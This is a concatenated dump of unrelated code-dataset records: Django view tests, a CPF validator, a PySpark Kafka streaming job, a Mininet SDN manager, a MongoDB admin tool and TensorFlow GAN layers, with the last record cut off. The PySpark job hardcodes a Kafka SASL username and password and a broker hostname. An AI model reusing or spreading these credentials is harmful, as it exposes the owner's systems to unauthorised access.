= 'R'\n # data_fn = f'/Users/cda0201/personal/learnedleague/LL{season}_{rundle}'\n # players = ['DunnC4']\n # for player in players:\n # luck(data_fn, player)","repo_name":"ccdunn/learnedleague","sub_path":"luck.py","file_name":"luck.py","file_ext":"py","file_size_in_byte":8481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"645881004","text":"import tempfile\nimport shutil\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.core.cache import cache\nfrom django.conf import settings\nfrom django.test import TestCase, Client, override_settings\nfrom django.urls import reverse\n\nfrom ..models import Group, Post, User, Comment, Follow\n\n\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\nUSERNAME = 'TestUser'\nUSERNAME_2 = 'TestUser_2'\nUSERNAME_3 = 'TestUser_3'\nUSERNAME_4 = 'TestUser_4'\nSLUG = 'test-slug'\nSLUG_2 = 'test_slug_2'\n\nINDEX_URL = reverse('posts:index')\nPROFILE_URL = reverse('posts:profile', args=[USERNAME])\nGROUP_LIST_URL = reverse('posts:group_list', args=[SLUG])\nGROUP_LIST_URL_2 = reverse('posts:group_list', args=[SLUG_2])\nFOLLOW_URL = reverse('posts:follow_index')\nPROFILE_FOLLOW = reverse('posts:profile_follow', args=[USERNAME_2])\nPROFILE_UNFOLLOW = reverse('posts:profile_unfollow', args=[USERNAME_2])\n\nGIF = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n)\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass ViewsTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.guest_client = Client()\n cls.user = User.objects.create_user(username=USERNAME)\n cls.user_2 = User.objects.create_user(username=USERNAME_2)\n cls.user_3 = User.objects.create_user(username=USERNAME_3)\n cls.user_4 = User.objects.create_user(username=USERNAME_4)\n cls.authorized_client = Client()\n cls.another_authorized = Client()\n cls.another_authorized_2 = Client()\n cls.authorized_client.force_login(cls.user)\n cls.another_authorized.force_login(cls.user_3)\n cls.another_authorized_2.force_login(cls.user_4)\n cls.image = SimpleUploadedFile(\n name='small.gif',\n content=GIF,\n content_type='image/gif'\n )\n cls.group = Group.objects.create(\n title='Тестовый заголовок',\n slug=SLUG,\n description='Тестовое описание',\n )\n cls.group_2 = Group.objects.create(\n title='Тестовый заголовок',\n slug=SLUG_2,\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n text='Тестовый текст',\n group=cls.group,\n author=cls.user,\n image=cls.image\n )\n cls.comment = Comment.objects.create(\n post=cls.post,\n author=cls.user_3,\n text='Комментарий'\n )\n cls.follow = Follow.objects.create(\n user=cls.user_4,\n author=cls.user\n )\n cls.POST_DETAIL_URL = reverse('posts:post_detail', args=[cls.post.pk])\n cls.POST_EDIT_URL = reverse('posts:post_edit', args=[cls.post.pk])\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def test_show_correct_context(self):\n CASES = [\n (INDEX_URL, self.guest_client, 'page_obj'),\n (GROUP_LIST_URL, self.guest_client, 'page_obj'),\n (PROFILE_URL, self.authorized_client, 'page_obj'),\n (self.POST_DETAIL_URL, self.guest_client, 'post'),\n (FOLLOW_URL, self.another_authorized_2, 'page_obj')\n ]\n for url, client, context in CASES:\n with self.subTest(url=url):\n response = client.get(url)\n post = response.context[context]\n if context == 'page_obj':\n self.assertEqual(len(post), 1)\n post = post[0]\n self.assertEqual(post.id, self.post.id)\n self.assertEqual(post.text, self.post.text)\n self.assertEqual(post.group, self.group)\n self.assertEqual(post.author, self.post.author)\n self.assertEqual(post.image, self.post.image)\n\n def test_cache(self):\n \"\"\"Данные в кэше хранятся до его обновления/очистки\"\"\"\n response = self.guest_client.get(INDEX_URL)\n Post.objects.all().delete()\n self.assertEqual(\n response.content, self.guest_client.get(INDEX_URL).content\n )\n cache.clear()\n self.assertNotEqual(\n response.content, self.guest_client.get(INDEX_URL).content\n )\n\n def test_profile_in_context(self):\n \"\"\"Шаблон profile сформирован с правильным контекстом.\"\"\"\n response = self.authorized_client.get(PROFILE_URL)\n self.assertEqual(response.context['author'], self.post.author)\n\n def test_group_in_context_group_list(self):\n \"\"\"Шаблон group_list сформирован с правильным контекстом.\"\"\"\n response = self.guest_client.get(GROUP_LIST_URL)\n group = response.context['group']\n self.assertEqual(group, self.post.group)\n self.assertEqual(group.slug, self.post.group.slug)\n self.assertEqual(\n group.description,\n self.post.group.description\n )\n self.assertEqual(group.pk, self.post.group.pk)\n\n def test_post_not_in_context(self):\n CASES = [\n (GROUP_LIST_URL_2, self.another_authorized, 'page_obj'),\n (FOLLOW_URL, self.another_authorized, 'page_obj')\n ]\n for url, client, context in CASES:\n with self.subTest(url=url):\n page = client.get(url).context[context]\n self.assertNotIn(self.post, page)\n\n def test_profile_follow_follow(self):\n \"\"\"Авторизованный пользователь может подписываться на других\"\"\"\n self.authorized_client.get(PROFILE_FOLLOW)\n self.assertTrue(Follow.objects.filter(\n author__username=USERNAME_2, user=self.user\n ).exists())\n\n def test_profile_follow_unfollow(self):\n \"\"\"Авторизованный пользователь может удалять пользователей\"\"\"\n \"\"\"из подписок.\"\"\"\n self.authorized_client.get(PROFILE_UNFOLLOW)\n self.assertFalse(Follow.objects.filter(\n author__username=USERNAME_2, user=self.user\n ).exists())\n\n def test_pages_index_contains_correct_records(self):\n \"\"\"На страницу выводится корректное кол-во постов\"\"\"\n Post.objects.all().delete()\n NUMBER_FOR_TEST = 3\n\n count_posts = settings.POSTS_ON_PAGE + NUMBER_FOR_TEST\n Post.objects.bulk_create(\n Post(text='Тестовый текст',\n group=self.group,\n author=self.user\n ) for i in range(count_posts)\n )\n CASES = [\n (INDEX_URL, settings.POSTS_ON_PAGE, self.guest_client),\n (GROUP_LIST_URL, settings.POSTS_ON_PAGE, self.guest_client),\n (PROFILE_URL, settings.POSTS_ON_PAGE, self.authorized_client),\n (INDEX_URL + '?page=2', NUMBER_FOR_TEST, self.guest_client),\n (GROUP_LIST_URL + '?page=2', NUMBER_FOR_TEST, self.guest_client),\n (PROFILE_URL + '?page=2', NUMBER_FOR_TEST, self.authorized_client)\n ]\n for url, count_posts, client in CASES:\n with self.subTest(url=url):\n print(len(client.get(url).context['page_obj']))\n self.assertEqual(\n len(client.get(url).context['page_obj']),\n count_posts\n )\n","repo_name":"Maxim-Smirnov-1998/hw05_final","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":7771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4612525416","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 16:20:11 2018\n\n@author: joshu\n\"\"\"\n\ninformation = input(\"Enter the information to make acronym: \")\ntemp_list = information.split(\" \")\n\nfor i in temp_list:\n print(i[0].capitalize(), end='')","repo_name":"Jadams29/Coding_Problems","sub_path":"String Functions/Acronym.py","file_name":"Acronym.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44041501694","text":"cpf = input('Informe o seu CPF, sem virgulas e traços: ')\n\ncontador = 0\ncontador2 = 0\nsomatotal = 0\nsomatotal2 = 0\ncpfnew = cpf[:-2]\n\nfor i in range(10, 1, -1):\n\n num_cpf = cpfnew[contador]\n contador+=1\n soma = int(num_cpf) * i\n somatotal += soma\n\nnovoDigito = 11 - (somatotal % 11)\nif novoDigito > 9:\n novoDigito = 0\ncpfnew += str(novoDigito)\n\n\nfor j in range(11, 1, -1):\n num_cpf2 = cpfnew[contador2]\n contador2+=1\n soma2 = int(num_cpf2)*j\n somatotal2 += soma2\n\nnovoDigito2 = 11 - (somatotal2 % 11)\nif novoDigito2 > 9:\n novoDigito2 = 0\ncpfnew+= str(novoDigito2)\n\nif cpf == cpfnew:\n print(\"CPF valido! \")\nelse:\n print(\"CPF invalido! \")","repo_name":"andersonxtrindade/pythonUdemy","sub_path":"AulasBasicas/validadeCpf.py","file_name":"validadeCpf.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32402188971","text":"#studentFileData\r\n\r\n# An exception for an empty file.\r\nclass FileEmpty(Exception):\r\n def __init__(self):\r\n super().__init__(self)\r\n\r\nmydict = {}\r\nfile = input(\"please input file name to process: \")\r\n\r\ntry:\r\n results = open(file, 'rt')\r\n lines = results.readlines()\r\n results.close()\r\n if len(lines) == 0:\r\n raise FileEmpty()\r\n for line in lines:\r\n fname, sname, score = line.split(\" \")\r\n name = fname+\" \"+sname\r\n score = float(score)\r\n if name in mydict.keys():\r\n mydict[name] += score\r\n else:\r\n mydict[name] = score\r\n results.close()\r\n \r\nexcept IOError as e:\r\n print(\"I/O error :\", str(e.errno), \", \", e)\r\nexcept FileEmpty:\r\n print(\"source file empty\")\r\n\r\nfo = open(\"scores.txt\", 'wt')\r\n\r\nfor name, score in mydict.items():\r\n line = name + \"\\t\" + str(score) + \"\\n\"\r\n fo.write(line)\r\nfo.close()\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n","repo_name":"stephenmcnicholas/PythonExamples","sub_path":"progs/studentResults_readFromFile.py","file_name":"studentResults_readFromFile.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26424180448","text":"import time\n\nfrom pyspark.sql import SparkSession, DataFrame\nfrom pyspark.sql.types import StructType, StructField, StringType, LongType\nfrom pyspark.sql.functions import from_json, to_json, col, lit, struct, unix_timestamp, current_timestamp\n\nSPARK_JARS_PACKAGES = \",\".join(\n [\n \"org.apache.spark:spark-sql-kafka-0-10_2.12:3.3.0\",\n \"org.postgresql:postgresql:42.4.0\",\n ]\n )\n\nKAFKA_SECURITY_OPTIONS = {\n 'kafka.bootstrap.servers': 'rc1b-2erh7b35n4j4v869.mdb.yandexcloud.net:9091',\n 'kafka.security.protocol': 'SASL_SSL',\n 'kafka.sasl.mechanism': 'SCRAM-SHA-512',\n 'kafka.sasl.jaas.config': 'org.apache.kafka.common.security.scram.ScramLoginModule required username=\\\"de-student\\\" password=\\\"ltcneltyn\\\";',\n}\n\nPOSTGRES_SECURITY_OPTIONS = {\n 'url': 'jdbc:postgresql://localhost:5432/postgres',\n 'driver': 'org.postgresql.Driver',\n 'user': 'jovyan',\n 'password': 'jovyan',\n}\n\ndef spark_init() -> SparkSession:\n\n spark = (SparkSession.builder\n .appName(\"RestaurantSubscribeStreamingService\")\n .config(\"spark.sql.session.timeZone\", \"UTC\")\n .config(\"spark.jars.packages\", SPARK_JARS_PACKAGES)\n .getOrCreate()\n )\n\n return spark\n\ndef read_kafka_stream(spark: SparkSession) -> DataFrame:\n\n restaurant_read_stream_df = (spark.readStream\n .format('kafka')\n .options(**KAFKA_SECURITY_OPTIONS)\n .option('subscribe', 'ivivchick_in')\n .load()\n )\n\n return restaurant_read_stream_df\n\ndef transform(df: DataFrame) -> DataFrame:\n\n incomming_message_schema = StructType(\n [StructField(\"restaurant_id\", StringType(), True),\n StructField(\"adv_campaign_id\", StringType(), True),\n StructField(\"adv_campaign_content\", StringType(), True),\n StructField(\"adv_campaign_owner\", StringType(), True),\n StructField(\"adv_campaign_owner_contact\", StringType(), True),\n StructField(\"adv_campaign_datetime_start\", LongType(), True),\n StructField(\"adv_campaign_datetime_end\", LongType(), True),\n StructField(\"datetime_created\", LongType(), True)])\n\n filtered_read_stream_df = (df\n .withColumn('value', from_json(col('value').cast(StringType()), incomming_message_schema))\n .withColumn('key', col('key').cast(StringType()))\n .selectExpr('value.*', '*')\n .dropDuplicates(['restaurant_id', 'adv_campaign_id'])\n .withWatermark('timestamp', '5 minute')\n .filter((col('adv_campaign_datetime_end') > unix_timestamp(current_timestamp())) &\n (col('adv_campaign_datetime_start') < unix_timestamp(current_timestamp()))\n )\n )\n\n return filtered_read_stream_df\n\ndef read_from_postgres(spark: SparkSession) -> DataFrame:\n subscribers_restaurant_df = (spark.read\n .format('jdbc')\n .options(**POSTGRES_SECURITY_OPTIONS)\n .option('dbtable', 'subscribers_restaurants')\n .load()\n .select('restaurant_id', 'client_id')\n .distinct()\n )\n\n return subscribers_restaurant_df\n\ndef foreach_batch_function(df, epoch_id) -> None:\n perst_df = (df.select(\n col('restaurant_id'),\n col('adv_campaign_id'),\n col('adv_campaign_content'),\n col('adv_campaign_owner'),\n col('adv_campaign_owner_contact'),\n col('adv_campaign_datetime_start'),\n col('adv_campaign_datetime_end'),\n col('datetime_created'),\n col('client_id'),\n unix_timestamp(current_timestamp()).alias('trigger_datetime_created')\n )\n .persist()\n )\n\n (perst_df\n .withColumn('feedback', lit(None))\n .write\n .format('jdbc')\n .options(**POSTGRES_SECURITY_OPTIONS)\n .option('dbtable', 'subscribers_feedback')\n .mode(\"append\")\n .save()\n )\n\n (perst_df\n .select(to_json(\n struct(\n col('restaurant_id'),\n col('adv_campaign_id'),\n col('adv_campaign_content'),\n col('adv_campaign_owner'),\n col('adv_campaign_owner_contact'),\n col('adv_campaign_datetime_start'),\n col('adv_campaign_datetime_end'),\n col('datetime_created'),\n col('client_id'),\n col('trigger_datetime_created'),\n )).cast(StringType()).alias('value')\n )\n .write\n .format(\"kafka\")\n .options(**KAFKA_SECURITY_OPTIONS)\n .option('topic', 'ivivchick_out')\n .save()\n\n )\n perst_df.unpersist()\n\ndef main():\n\n spark = spark_init()\n stream_df = read_kafka_stream(spark)\n postgres_df = read_from_postgres(spark)\n\n filtered_stream_df = transform(stream_df)\n\n result_df = filtered_stream_df.join(postgres_df, ['restaurant_id'])\n\n query = (result_df.writeStream\n .trigger(processingTime='5 seconds')\n .foreachBatch(foreach_batch_function)\n .start())\n\n while query.isActive:\n print(f\"query information: runId={query.runId}, \"\n f\"status is {query.status}, \"\n f\"recent progress={query.recentProgress}\")\n time.sleep(15)\n\n try:\n query.awaitTermination()\n finally:\n query.stop()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Ivivchik/de-project-sprint-8","sub_path":"src/scripts/restaurant_subscribe_streaming_service.py","file_name":"restaurant_subscribe_streaming_service.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4628318254","text":"import logging\nfrom dataclasses import asdict, dataclass\nfrom subprocess import run, PIPE\nfrom typing import List, Dict\n\nimport dacite\nfrom mininet.link import TCLink\nfrom mininet.net import Mininet\nfrom mininet.node import Host, Controller, RemoteController\nfrom mininet.util import dumpNetConnections\nfrom socket import gethostbyname_ex\nfrom sdnsandbox.topology import SDNSandboxTopologyCreator, TopologyCreatorFactory, Link, Switch\nfrom sdnsandbox.util import countdown\nfrom re import fullmatch\n\nlogger = logging.getLogger(__name__)\n\n\nclass SDNSandboxNetworkFactory(object):\n @staticmethod\n def create(network_conf):\n # we assume the first ip is enough, this works for both an IP address and DNS name\n controller_ip = gethostbyname_ex(network_conf['controller']['ip'])[2][0]\n controller = RemoteController('controller', ip=controller_ip, port=network_conf['controller']['port'])\n network_conf['controller'] = controller\n topology_creator = TopologyCreatorFactory.create(network_conf['topology_creator'])\n network_conf['topology_creator'] = topology_creator\n config = dacite.from_dict(data_class=SDNSandboxNetworkConfig, data=network_conf)\n return SDNSandboxNetwork(config)\n\n\n@dataclass\nclass Interface:\n num: int\n name: str\n net_meaning: str\n\n\n@dataclass\nclass SDNSandboxNetworkConfig:\n topology_creator: SDNSandboxTopologyCreator\n controller: Controller\n test_ping_all_full: bool = False\n\n\n@dataclass\nclass SDNSandboxNetworkData:\n interfaces: Dict[int, Interface]\n switches: Dict[int, Switch]\n switch_links: List[Link]\n\n\nclass SDNSandboxNetwork:\n def __init__(self, config: SDNSandboxNetworkConfig):\n self.config = config\n self.interfaces: Dict[int, Interface] = {}\n self.net = None\n\n def start(self):\n \"\"\"Create network and start it\"\"\"\n topology = self.config.topology_creator.create()\n self.net = Mininet(topo=topology, controller=lambda unneeded: self.config.controller, link=TCLink)\n self.net.start()\n\n logger.info(\"Waiting for the controller to finish network setup...\")\n countdown(logger.info, 3)\n\n dumpNetConnections(self.net)\n if self.config.test_ping_all_full:\n logger.info(\"Performing a full mesh ping to make sure the network is well connected...\")\n self.net.pingAllFull()\n switch_names = {sw.ID: sw.name for sw in self.config.topology_creator.switches.values()}\n self.interfaces = self.get_inter_switch_port_interfaces(switch_names)\n return self.net\n\n def stop(self):\n if not self.is_started(): raise RuntimeError(\"Can't run this when the network is not started first!\")\n logger.info(\"Stopping the network...\")\n self.net.stop()\n self.net = None\n self.interfaces = {}\n\n def get_hosts(self) -> List[Host]:\n if not self.is_started(): raise RuntimeError(\"Can't run this when the network is not started first!\")\n return self.net.hosts\n\n @staticmethod\n def get_interface_net_meaning(intf_name: str, switches: Dict[int, str]):\n split = intf_name.split('@')\n for switch in split:\n switch_name = switch.split('-')[0]\n switch_num = int(switch_name[1:])\n intf_name = intf_name.replace(switch_name + '-', switches[switch_num] + '-')\n return intf_name\n\n @staticmethod\n def get_inter_switch_port_interfaces(switches: Dict[int, str],\n port_re=\"s[0-9]+-eth[0-9]+@s[0-9]+-eth[0-9]+\",\n ip_a_getter=lambda:\n run([\"ip\", \"a\"], universal_newlines=True, stdout=PIPE, stderr=PIPE).stdout) \\\n -> Dict[int, Interface]:\n ip_a_out = ip_a_getter()\n interfaces = {}\n for line in ip_a_out.splitlines():\n # ignore none-main lines (those with extra data, not intf definition)\n if len(line) == 0 or line[0] == ' ':\n continue\n intf_split = line.split(':')\n intf_num = int(intf_split[0])\n intf_name = intf_split[1].strip()\n logger.debug(\"found interface #%d: \\n%s\", intf_num, intf_name)\n if fullmatch(port_re, intf_name):\n interfaces[intf_num] = Interface(intf_num,\n intf_name,\n SDNSandboxNetwork.get_interface_net_meaning(intf_name, switches))\n else:\n logger.debug(\"Interface %s doesn't have inter switch port name, irrelevant - dropped...\", intf_name)\n return interfaces\n\n def get_interfaces(self) -> Dict[int, Interface]:\n if not self.is_started(): raise RuntimeError(\"Can't run this when the network is not started first!\")\n return self.interfaces\n\n def get_network_data(self) -> SDNSandboxNetworkData:\n if not self.is_started(): raise RuntimeError(\"Can't run this when the network is not started first!\")\n return SDNSandboxNetworkData(self.interfaces,\n self.config.topology_creator.switches,\n self.config.topology_creator.switch_links)\n def is_started(self):\n return self.net != None\n","repo_name":"ScanLab-ossi/SDNSandbox","sub_path":"sdnsandbox/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25216741665","text":"#!/usr/bin/env python\n\nimport argparse\nimport ast\nimport os\nimport pymongo\nimport sys\n\npath = os.path.abspath(__file__)\npath = path.split(\"/\")\npath = \"/\".join(path[:-3])\nsys.path.append(path)\n\nfrom core.config import ConfParser\n\n\nclass CommandMgr(object):\n\n def __init__(self):\n \"\"\"\n Constructor of the service.\n \"\"\"\n self.config = ConfParser(\"ro.conf\")\n master_ro = self.config.get(\"master_ro\")\n self.mro_enabled = ast.literal_eval(master_ro.get(\"mro_enabled\"))\n\n self.TABLES = {\n \"domain.routing\":\n self.__get_table(\"domain.routing\"),\n \"resource.com.node\":\n self.__get_table(\"resource.com.node\"),\n \"resource.com.link\":\n self.__get_table(\"resource.com.link\"),\n \"resource.of.node\":\n self.__get_table(\"resource.of.node\"),\n \"resource.of.link\":\n self.__get_table(\"resource.of.link\"),\n \"resource.se.link\":\n self.__get_table(\"resource.se.link\"),\n \"resource.se.node\":\n self.__get_table(\"resource.se.node\"),\n \"resource.tn.link\":\n self.__get_table(\"resource.tn.link\"),\n \"resource.tn.node\":\n self.__get_table(\"resource.tn.node\"),\n \"topology.slice\":\n self.__get_table(\"topology.slice\"),\n \"topology.slice.sdn\":\n self.__get_table(\"topology.slice.sdn\"),\n \"scheduler.jobs\":\n self.__get_table(\"scheduler.jobs\"),\n \"domain.info\":\n self.__get_table(\"domain.info\"),\n \"topology.physical\":\n self.__get_table(\"topology.physical\"),\n }\n\n def __get_table(self, table_name):\n db_name = \"felix_ro\"\n if self.mro_enabled:\n db_name = \"felix_mro\"\n return getattr(getattr(pymongo.MongoClient(), db_name), table_name)\n\n def __select(self, table, name):\n print(\"\\n\\n\" + \"(RO) %s has %d rows\\n\" % (name, table.count()))\n for row in table.find():\n print(\"%s\" % (row))\n\n def __delete(self, table, name):\n table.remove()\n print(\"\\n\\n\" + \"Deleted all rows of (RO) %s\" % (name))\n\n def list_tables(self):\n print(\"\\n\\nManaged Tables: %s\\n\\n\" % self.TABLES.keys())\n\n def select_routing_table(self):\n self.__select(self.TABLES[\"domain.routing\"],\n \"domain.routing\")\n\n def select_ofdatapath_table(self):\n self.__select(self.TABLES[\"resource.of.node\"],\n \"resource.of.node\")\n\n def select_oflink_table(self):\n self.__select(self.TABLES[\"resource.of.link\"],\n \"resource.of.link\")\n\n def delete_routing_table(self):\n self.__delete(self.TABLES[\"domain.routing\"],\n \"domain.routing\")\n\n def delete_ofdatapath_table(self):\n self.__delete(self.TABLES[\"resource.of.node\"],\n \"resource.of.node\")\n\n def delete_oflink_table(self):\n self.__delete(self.TABLES[\"resource.of.link\"],\n \"resource.of.link\")\n\n def delete_all_tables(self):\n for table, mongo_table in self.TABLES.items():\n self.__delete(mongo_table, table)\n\n\ndef main(argv=None):\n if not argv:\n argv = sys.argv\n\n try:\n bug_reporter_ = ''\n parser_ = argparse.ArgumentParser(\n description='RO Read MongoDB tables',\n epilog='Please, report bugs to ' + bug_reporter_,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser_.add_argument('--action',\n choices=['list_tables',\n 'select_routing_table',\n 'select_ofdatapath_table',\n 'select_oflink_table',\n 'delete_routing_table',\n 'delete_ofdatapath_table',\n 'delete_oflink_table',\n 'delete_all_tables'],\n required=True,\n help='Make an action on (RO) MongoDB')\n\n args_ = parser_.parse_args()\n\n except Exception as ex:\n print(\"Got an exception parsing flags/options: %s\" % ex)\n return False\n\n print(\"Args=%s\" % (args_,))\n try:\n if args_.action == 'list_tables':\n CommandMgr().list_tables()\n elif args_.action == 'select_routing_table':\n CommandMgr().select_routing_table()\n elif args_.action == 'select_ofdatapath_table':\n CommandMgr().select_ofdatapath_table()\n elif args_.action == 'select_oflink_table':\n CommandMgr().select_oflink_table()\n elif args_.action == 'delete_routing_table':\n CommandMgr().delete_routing_table()\n elif args_.action == 'delete_ofdatapath_table':\n CommandMgr().delete_ofdatapath_table()\n elif args_.action == 'delete_oflink_table':\n CommandMgr().delete_oflink_table()\n elif args_.action == 'delete_all_tables':\n CommandMgr().delete_all_tables()\n\n except Exception as e:\n print(\"Got an Exception: %s\" % (str(e)))\n return False\n return True\n\n\nif __name__ == '__main__':\n # update sys-path\n bp_ = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0])))\n if bp_ not in [os.path.abspath(x) for x in sys.path]:\n sys.path.insert(0, bp_)\n\n sys.exit(main())\n","repo_name":"dana-i2cat/felix","sub_path":"modules/resource/orchestrator/src/admin/db/action_db.py","file_name":"action_db.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"71127081107","text":"class Solution:\n def palindromePairs(self, words: List[str]) -> List[List[int]]:\n def is_palin(w):\n return True if w == w[::-1] else False\n pre, aft, res = {}, {}, []\n for w in words:\n pre[w], aft[w] = {w[::-1]}, {w[::-1]}\n for i in range(len(w)):\n if is_palin(w[i::-1]): pre[w].add(w[:i:-1])\n if is_palin(w[i:]): \n if i > 0: aft[w].add(w[i-1::-1])\n else: aft[w].add(\"\")\n for i in range(len(words)):\n for j in range(i+1, len(words)):\n if words[i] in pre[words[j]] or words[j] in aft[words[i]]: res.append([i, j])\n if words[i] in aft[words[j]] or words[j] in pre[words[i]]: res.append([j, i])\n return res\n","repo_name":"cedricwangyu/LC","sub_path":"336-Palindrome_Pairs.py","file_name":"336-Palindrome_Pairs.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"17086668657","text":"import sys\nimport logging\nfrom flask import Flask\nfrom nomadic.server.routes import routes\n\n\nclass Server():\n \"\"\"handles the web interface and\n refreshing of connected clients.\"\"\"\n\n def __init__(self, port):\n self.app = Flask(__name__,\n static_folder='assets/static',\n static_url_path='/static',\n template_folder='assets/templates')\n self.app.register_blueprint(routes)\n self.port = port\n\n # log to stdout\n sh = logging.StreamHandler(sys.stdout)\n self.app.logger.addHandler(sh)\n\n def start(self):\n self.app.run(port=self.port)\n","repo_name":"frnsys/nomadic","sub_path":"nomadic/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"74584433424","text":"# The MIT License (MIT)\r\n#\r\n# Original work Copyright (c) 2016 Taehoon Kim\r\n# Modified work Copyright (c) 2017, NVIDIA CORPORATION. All rights reserved.\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\nimport tensorflow as tf\r\nfrom model import Tower\r\nfrom utils import model_property\r\n\r\nimage_summary = tf.summary.image\r\nscalar_summary = tf.summary.scalar\r\nhistogram_summary = tf.summary.histogram\r\nmerge_summary = tf.summary.merge\r\nSummaryWriter = tf.summary.FileWriter\r\n\r\n\r\nclass batch_norm(object):\r\n \"\"\"\r\n This class creates an op that composes the specified tensor with a batch\r\n normalization layer.\r\n \"\"\"\r\n\r\n def __init__(self, epsilon=1e-5, momentum=0.9, name=\"batch_norm\"):\r\n \"\"\"Instance initialization\"\"\"\r\n with tf.variable_scope(name):\r\n self.epsilon = epsilon\r\n self.momentum = momentum\r\n self.name = name\r\n\r\n def __call__(self, x, train=True):\r\n \"\"\"\r\n Functional interface\r\n\r\n Args:\r\n x: tensor to compose\r\n train: set to True during training and False otherwise\r\n \"\"\"\r\n return tf.contrib.layers.batch_norm(x,\r\n decay=self.momentum,\r\n updates_collections=None,\r\n epsilon=self.epsilon,\r\n scale=True,\r\n is_training=train,\r\n scope=self.name)\r\n\r\n\r\ndef conv2d(input_, output_dim,\r\n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\r\n name=\"conv2d\"):\r\n \"\"\"\r\n Compose specified symbol with 2D convolution layer\r\n\r\n Args:\r\n input_: tensor to compose. Shape: [N, H, W, C]\r\n output_dim: number of output features maps\r\n k_h: kernel height\r\n k_w: kernel width\r\n d_h: horizontal stride\r\n d_w: vertical stride\r\n stddev: standard deviation of gaussian distribution to use for random weight initialization\r\n name: name scope\r\n\r\n Returns:\r\n Composed tensor.\r\n \"\"\"\r\n with tf.variable_scope(name):\r\n w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\r\n initializer=tf.truncated_normal_initializer(stddev=stddev))\r\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')\r\n\r\n biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))\r\n conv = tf.nn.bias_add(conv, biases)\r\n\r\n return conv\r\n\r\n\r\ndef deconv2d(input_, output_shape,\r\n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\r\n name=\"deconv2d\", with_w=False):\r\n \"\"\"\r\n Compose specified symbol with 2D *transpose* convolution layer\r\n\r\n Args:\r\n input_: tensor to compose. Shape: [N, H, W, C]\r\n output_shape: output shape\r\n k_h: kernel height\r\n k_w: kernel width\r\n d_h: horizontal stride\r\n d_w: vertical stride\r\n stddev: standard deviation of gaussian distribution to use for random weight initialization\r\n name: name scope\r\n\r\n Returns:\r\n Composed tensor.\r\n \"\"\"\r\n with tf.variable_scope(name):\r\n # filter : [height, width, output_channels, in_channels]\r\n w = tf.get_variable('w',\r\n [k_h, k_w, output_shape[-1],\r\n input_.get_shape()[-1]],\r\n initializer=tf.random_normal_initializer(stddev=stddev))\r\n deconv = tf.nn.conv2d_transpose(input_, w,\r\n output_shape=output_shape,\r\n strides=[1, 